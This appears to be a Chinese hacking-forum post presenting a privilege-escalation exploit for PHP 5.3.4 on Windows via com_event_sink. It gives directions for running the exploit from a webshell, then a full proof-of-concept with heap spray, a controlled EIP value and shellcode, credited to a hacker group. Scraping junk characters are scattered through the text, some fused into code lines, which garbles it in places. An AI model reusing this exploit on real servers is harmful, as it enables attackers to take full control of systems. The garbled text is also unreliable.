PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
* E$ Y" p' Q6 U6 I
) \5 h) N; d4 r测试方法如下：cmd /c x:\php\php.exe x:\test.php

3 Q2 }% ^9 E3 `( p下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
这里是两个测试的截图：
6 A( M4 d5 l& B- [; h& P9 _2 o
* s4 G& Z; L! @* o
3 }6 C+ u8 O6 n. C9 n# L


" a7 ?* @. z1 k0 R, `成功利用此漏洞的攻击者将获得系统的最高权限
+ z) M9 @" y6 p  _. Y
; r! O  N# e1 K2 j+ @- s6 @! _


5 N* E- A2 [: W# m% A6 _( p: }/ p
( `  g! w1 A% d  t0 H2 I关于漏洞分析稍后附上。一下是PoC代码：
' O, \" d% Q3 b( Q- ^- s+ r& I
<?php
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
//$eip ="\x44\x43\x42\x41";
! h- g9 I; E" O1 a7 V+ C' Y$eip= "\x4b\xe8\x57\x78";
6 r; H1 U: |! w, L8 s8 q8 K5 L" G$eax ="\x80\x01\x8d\x04";
$deodrant="";
1 n8 Y) n" M6 p& Z0 d1 O$axespray = str_repeat($eip.$eax,0x80);
//048d0190
echo strlen($axespray);
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
. @$ u5 E2 O- Z/ q$ o5 w//19200 ==4B32 4b00
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
5 F( Y* k# \3 c" V# D* d; v9 ~$terminate = "T";
$u[] =$deodrant;
) F3 s& Z5 O$ k5 b1 u9 t$r[] =$deodrant.$terminate;
% n1 ~% {. ^$ t& B" c0 Y$a[] =$deodrant.$terminate;
% C" g0 D; F% _$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
$vVar = new VARIANT(0x048d0000+180);
# W( B: R5 `6 J- @4 g+ W% Q5 n//弹窗代码(Shellcode)
  N6 [" U3 v3 P7 `; w$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$var2 = new VARIANT(0x41414242);
com_event_sink($vVar,$var2,$buffer);
?>